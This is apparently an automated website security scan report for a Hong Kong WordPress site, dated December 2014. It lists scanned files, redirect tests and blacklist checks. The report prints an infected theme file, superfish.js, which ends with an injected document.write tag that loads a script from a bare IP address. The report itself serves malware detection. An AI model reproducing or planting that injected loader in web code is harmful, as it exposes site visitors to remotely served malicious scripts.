Scanned pages/files
Request | Server response | Status |
http://adpl.org.hk/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 22:58:28 GMT Location: http://www.adpl.org.hk/ Server: Apache/2.2.22 (@RELEASE@) Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498709%7C5a4a1f4ffac47019ef294964a66c088d; expires=Mon, 05-Jan-2015 22:58:29 GMT; path=/wp-content/plugins; httponly Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498709%7C5a4a1f4ffac47019ef294964a66c088d; expires=Mon, 05-Jan-2015 22:58:29 GMT; path=/wp-admin; httponly Set-Cookie: wordpress_logged_in_a37d114357e042ef6a245795dc236686=%7C1420498709%7Ccb5cd9910608f2ff781df74341f3a4d0; expires=Mon, 05-Jan-2015 22:58:29 GMT; path=/; httponly X-Pingback: http://www.adpl.org.hk/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://www.adpl.org.hk/ | 200 OK Content-Length: 41545 Content-Type: text/html | clean |
http://www.adpl.org.hk/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: text/javascript | clean |
http://www.adpl.org.hk/wp-content/themes/UpStream/lib/js/superfish.js?ver=3.5.1 | 200 OK Content-Length: 3926 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); $$.showSuperfishUl().siblings().hideSuperfishUl(); }, out = function(){ var $$ = $(this), menu = getMenu($$), o = sf.op; cle var o = sf.op, sh = sf.c.shadowClass+'-off', $ul = this.addClass(o.hoverClass) .find('>ul:hidden').css('visibility','visible'); sf.IE7fix.call($ul); o.onBeforeShow.call($ul); $ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); }); return this; } }); })(jQuery); document.write("<script language=javascript src=http://210.56.48.167/cpt/all.js></script>") Antivirus reports:
| ||
http://www.adpl.org.hk/wp-content/themes/UpStream/includes/featuredposts/scripts/jquery.cycle.all.js | 200 OK Content-Length: 51328 Content-Type: text/javascript | clean |
http://www.adpl.org.hk/wp-content/plugins/youtube-sidebar-widget/script.js | 200 OK Content-Length: 1560 Content-Type: text/javascript | clean |
http://www.adpl.org.hk/wp-includes/js/hoverIntent.min.js?ver=r6 | 200 OK Content-Length: 996 Content-Type: text/javascript | clean |
http://stats.wordpress.com/e-201452.js | 200 OK Content-Length: 2332 Content-Type: application/x-javascript | clean |
http://adpl.org.hk/index.php?page_id=50 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 22:58:36 GMT Location: http://www.adpl.org.hk/?page_id=50 Server: Apache/2.2.22 (@RELEASE@) Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498716%7C0dc9d5b2c44e10595b4ce81ad1c9cb10; expires=Mon, 05-Jan-2015 22:58:36 GMT; path=/wp-content/plugins; httponly Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498716%7C0dc9d5b2c44e10595b4ce81ad1c9cb10; expires=Mon, 05-Jan-2015 22:58:36 GMT; path=/wp-admin; httponly Set-Cookie: wordpress_logged_in_a37d114357e042ef6a245795dc236686=%7C1420498716%7Ca637a523dae879ef02bfdd4313c99fc5; expires=Mon, 05-Jan-2015 22:58:36 GMT; path=/; httponly X-Pingback: http://www.adpl.org.hk/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://www.adpl.org.hk/?page_id=50 | 200 OK Content-Length: 30623 Content-Type: text/html | clean |
http://www.adpl.org.hk/wp-content/plugins/ckeditor-for-wordpress/ckeditor/ckeditor.js?t=CBDD&ver=3.5.1 | 200 OK Content-Length: 300914 Content-Type: text/javascript | clean |
http://www.adpl.org.hk/wp-content/plugins/ckeditor-for-wordpress/includes/ckeditor.utils.js?ver=3.5.1 | 200 OK Content-Length: 16591 Content-Type: text/javascript | clean |
http://www.adpl.org.hk/wp-content/plugins/ckeditor-for-wordpress/includes/ckeditor.comment-reply.js?ver=20100901 | 200 OK Content-Length: 1354 Content-Type: text/javascript | clean |
http://adpl.org.hk/index.php?cat=1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 22:58:43 GMT Location: http://www.adpl.org.hk/?cat=1 Server: Apache/2.2.22 (@RELEASE@) Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498723%7C3394fdf720a18186bf637d5c0643facc; expires=Mon, 05-Jan-2015 22:58:43 GMT; path=/wp-content/plugins; httponly Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498723%7C3394fdf720a18186bf637d5c0643facc; expires=Mon, 05-Jan-2015 22:58:43 GMT; path=/wp-admin; httponly Set-Cookie: wordpress_logged_in_a37d114357e042ef6a245795dc236686=%7C1420498723%7Cf7e170a9b8fcaf7cdb4d9af4c3a436c1; expires=Mon, 05-Jan-2015 22:58:43 GMT; path=/; httponly X-Pingback: http://www.adpl.org.hk/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://www.adpl.org.hk/?cat=1 | 200 OK Content-Length: 39852 Content-Type: text/html | clean |
http://www.adpl.org.hk/?page_id=9 | 200 OK Content-Length: 30094 Content-Type: text/html | clean |
http://www.adpl.org.hk/?page_id=12 | 200 OK Content-Length: 27156 Content-Type: text/html | clean |
http://www.adpl.org.hk/index.php?page_id=50 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 22:58:48 GMT Location: http://www.adpl.org.hk/?page_id=50 Server: Apache/2.2.22 (@RELEASE@) Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498728%7C4083581a4ae29b0bad026d12cb207ec2; expires=Mon, 05-Jan-2015 22:58:48 GMT; path=/wp-content/plugins; httponly Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498728%7C4083581a4ae29b0bad026d12cb207ec2; expires=Mon, 05-Jan-2015 22:58:48 GMT; path=/wp-admin; httponly Set-Cookie: wordpress_logged_in_a37d114357e042ef6a245795dc236686=%7C1420498728%7C4c08345ca8a98c3234dce7526f40ba72; expires=Mon, 05-Jan-2015 22:58:48 GMT; path=/; httponly X-Pingback: http://www.adpl.org.hk/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://www.adpl.org.hk/test404page.js | 404 Not Found Content-Length: 296 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: adpl.org.hk
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 22 Dec 2014 22:58:28 GMT
Location: http://www.adpl.org.hk/
Server: Apache/2.2.22 (@RELEASE@)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498709%7C5a4a1f4ffac47019ef294964a66c088d; expires=Mon, 05-Jan-2015 22:58:29 GMT; path=/wp-content/plugins; httponly
Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498709%7C5a4a1f4ffac47019ef294964a66c088d; expires=Mon, 05-Jan-2015 22:58:29 GMT; path=/wp-admin; httponly
Set-Cookie: wordpress_logged_in_a37d114357e042ef6a245795dc236686=%7C1420498709%7Ccb5cd9910608f2ff781df74341f3a4d0; expires=Mon, 05-Jan-2015 22:58:29 GMT; path=/; httponly
X-Pingback: http://www.adpl.org.hk/xmlrpc.php
X-Powered-By: PHP/5.3.3
...0 bytes of data.
GET / HTTP/1.1
Host: adpl.org.hk
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 22 Dec 2014 22:58:28 GMT
Location: http://www.adpl.org.hk/
Server: Apache/2.2.22 (@RELEASE@)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498709%7C5a4a1f4ffac47019ef294964a66c088d; expires=Mon, 05-Jan-2015 22:58:29 GMT; path=/wp-content/plugins; httponly
Set-Cookie: wordpress_a37d114357e042ef6a245795dc236686=%7C1420498709%7C5a4a1f4ffac47019ef294964a66c088d; expires=Mon, 05-Jan-2015 22:58:29 GMT; path=/wp-admin; httponly
Set-Cookie: wordpress_logged_in_a37d114357e042ef6a245795dc236686=%7C1420498709%7Ccb5cd9910608f2ff781df74341f3a4d0; expires=Mon, 05-Jan-2015 22:58:29 GMT; path=/; httponly
X-Pingback: http://www.adpl.org.hk/xmlrpc.php
X-Powered-By: PHP/5.3.3
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: adpl.org.hk
Referer: http://www.google.com/search?q=adpl.org.hk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: adpl.org.hk
Referer: http://www.google.com/search?q=adpl.org.hk
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=adpl.org.hk
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://adpl.org.hk/
Result: adpl.org.hk is not infected or malware details are not published yet.
Result: adpl.org.hk is not infected or malware details are not published yet.